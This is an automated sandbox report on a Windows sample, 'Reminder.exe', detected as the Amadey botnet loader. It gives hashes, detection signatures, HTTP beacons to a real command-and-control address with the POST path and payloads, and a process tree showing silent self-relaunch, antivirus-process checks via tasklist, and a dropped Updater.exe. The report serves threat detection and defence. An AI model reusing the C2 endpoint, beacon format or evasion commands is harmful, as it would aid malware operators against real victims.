Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name: Reminder.exe
Analysis ID: 1540342
MD5: d743bb6502147d38addb430590bc7a98
SHA1: 16cd70dd31fc54c0e42695441dbf3eab5de2e2bd
SHA256: ebe565a1a2b13e3cbcf7bcc58ea8bee81bd1ed2fed0e5977dc9e108ee8cbae95
Infos:

Detection

Amadey
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection

barindex
Source: Reminder.exe ReversingLabs: Detection: 54%
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Reminder.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

barindex
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.16:49724 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49719 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49725 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49729 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49721 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49723 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49717 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49727 -> 152.89.198.124:80
Source: Network traffic Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49731 -> 152.89.198.124:80
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown TCP traffic detected without corresponding DNS query: 152.89.198.124
Source: unknown HTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: Reminder.exe Static PE information: Number of sections : 11 > 10
Source: Reminder.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal84.troj.spyw.evad.winEXE@60/7@0/11
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\coigned
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: Local\SM0:2864:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\coigned\Updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: Reminder.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\Desktop\Reminder.exe File read: C:\Users\user\Desktop\Reminder.exe
Source: unknown Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\coigned\Updater.exe "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
